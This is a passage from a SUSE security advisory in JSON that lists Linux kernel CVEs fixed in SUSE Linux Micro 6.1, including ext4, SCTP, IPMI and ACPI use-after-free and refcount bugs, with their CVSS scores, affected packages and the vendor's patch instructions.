"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40178"
},
{
"cve": "CVE-2025-40179",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40179"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: verify orphan file size is not too big\n\nIn principle orphan file can be arbitrarily large. However orphan replay\nneeds to traverse it all and we also pin all its buffers in memory. Thus\nfilesystems with absurdly large orphan files can lead to big amounts of\nmemory consumed. Limit orphan file size to a sane value and also use\nkvmalloc() for allocating array of block descriptor structures to avoid\nlarge order allocations for sane but large orphan files.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40179",
"url": "https://www.suse.com/security/cve/CVE-2025-40179"
},
{
"category": "external",
"summary": "SUSE Bug 1253442 for CVE-2025-40179",
"url": "https://bugzilla.suse.com/1253442"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40179"
},
{
"cve": "CVE-2025-40187",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40187"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sctp: fix a null dereference in sctp_disposition sctp_sf_do_5_1D_ce()\n\nIf new_asoc-\u003epeer.adaptation_ind=0 and sctp_ulpevent_make_authkey=0\nand sctp_ulpevent_make_authkey() returns 0, then the variable\nai_ev remains zero and the zero will be dereferenced\nin the sctp_ulpevent_free() function.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40187",
"url": "https://www.suse.com/security/cve/CVE-2025-40187"
},
{
"category": "external",
"summary": "SUSE Bug 1253647 for CVE-2025-40187",
"url": "https://bugzilla.suse.com/1253647"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40187"
},
{
"cve": "CVE-2025-40190",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40190"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: guard against EA inode refcount underflow in xattr update\n\nsyzkaller found a path where ext4_xattr_inode_update_ref() reads an EA\ninode refcount that is already \u003c= 0 and then applies ref_change (often\n-1). That lets the refcount underflow and we proceed with a bogus value,\ntriggering errors like:\n\n EXT4-fs error: EA inode \u003cn\u003e ref underflow: ref_count=-1 ref_change=-1\n EXT4-fs warning: ea_inode dec ref err=-117\n\nMake the invariant explicit: if the current refcount is non-positive,\ntreat this as on-disk corruption, emit ext4_error_inode(), and fail the\noperation with -EFSCORRUPTED instead of updating the refcount. Delete the\nWARN_ONCE() as negative refcounts are now impossible; keep error reporting\nin ext4_error_inode().\n\nThis prevents the underflow and the follow-on orphan/cleanup churn.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40190",
"url": "https://www.suse.com/security/cve/CVE-2025-40190"
},
{
"category": "external",
"summary": "SUSE Bug 1253623 for CVE-2025-40190",
"url": "https://bugzilla.suse.com/1253623"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40190"
},
{
"cve": "CVE-2025-40202",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40202"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipmi: Rework user message limit handling\n\nThe limit on the number of user messages had a number of issues,\nimproper counting in some cases and a use after free.\n\nRestructure how this is all done to handle more in the receive message\nallocation routine, so all refcouting and user message limit counts\nare done in that routine. It\u0027s a lot cleaner and safer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40202",
"url": "https://www.suse.com/security/cve/CVE-2025-40202"
},
{
"category": "external",
"summary": "SUSE Bug 1253451 for CVE-2025-40202",
"url": "https://bugzilla.suse.com/1253451"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40202"
},
{
"cve": "CVE-2025-40211",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40211"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: video: Fix use-after-free in acpi_video_switch_brightness()\n\nThe switch_brightness_work delayed work accesses device-\u003ebrightness\nand device-\u003ebacklight, freed by acpi_video_dev_unregister_backlight()\nduring device removal.\n\nIf the work executes after acpi_video_bus_unregister_backlight()\nfrees these resources, it causes a use-after-free when\nacpi_video_switch_brightness() dereferences device-\u003ebrightness or\ndevice-\u003ebacklight.\n\nFix this by calling cancel_delayed_work_sync() for each device\u0027s\nswitch_brightness_work in acpi_video_bus_remove_notify_handler()\nafter removing the notify handler that queues the work. This ensures\nthe work completes before the memory is freed.\n\n[ rjw: Changelog edit ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40211",
"url": "https://www.suse.com/security/cve/CVE-2025-40211"
},
{
"category": "external",
"summary": "SUSE Bug 1254126 for CVE-2025-40211",
"url": "https://bugzilla.suse.com/1254126"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40211"
},
{
"cve": "CVE-2025-40215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40215"
}
],
"notes": [
{
"category": "general",
